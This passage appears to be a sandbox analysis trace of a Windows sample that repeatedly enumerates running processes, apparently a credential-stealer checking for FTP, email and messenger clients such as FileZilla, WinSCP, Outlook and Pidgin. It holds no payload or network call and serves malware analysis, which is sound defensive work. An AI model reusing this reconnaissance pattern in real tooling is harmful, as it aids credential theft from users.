pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0251.457] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0251.460] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0251.462] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0251.464] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0251.470] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0251.472] CloseHandle (hObject=0x17b0) returned 1 [0251.473] Sleep (dwMilliseconds=0x64) [0251.593] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0251.608] Process32First (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0251.610] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0251.613] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0251.615] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0251.617] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0251.619] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0251.657] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0251.660] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0251.663] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0251.666] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.668] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.724] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0251.726] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.728] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.731] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.737] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.739] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.741] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.743] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.745] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0251.747] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0251.750] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0251.756] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.758] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0251.761] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0251.834] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0251.841] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0251.847] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.849] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0251.851] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0251.853] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0251.855] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0251.860] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0251.863] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0251.865] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0251.867] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0251.869] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0251.907] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0251.909] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0251.911] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0251.914] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0251.916] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0251.917] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0251.923] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0251.925] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0251.927] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0251.928] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0251.930] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0251.931] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0251.933] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0251.938] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0251.939] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0251.941] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0251.942] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0251.944] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0251.946] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0251.947] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0251.949] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0251.977] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0251.980] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0251.986] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0251.989] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0251.991] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0251.994] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0252.000] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0252.003] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0252.006] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0252.009] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0252.011] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0252.068] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0252.071] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0252.075] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0252.081] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0252.084] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0252.086] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0252.089] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0252.095] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0252.098] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: 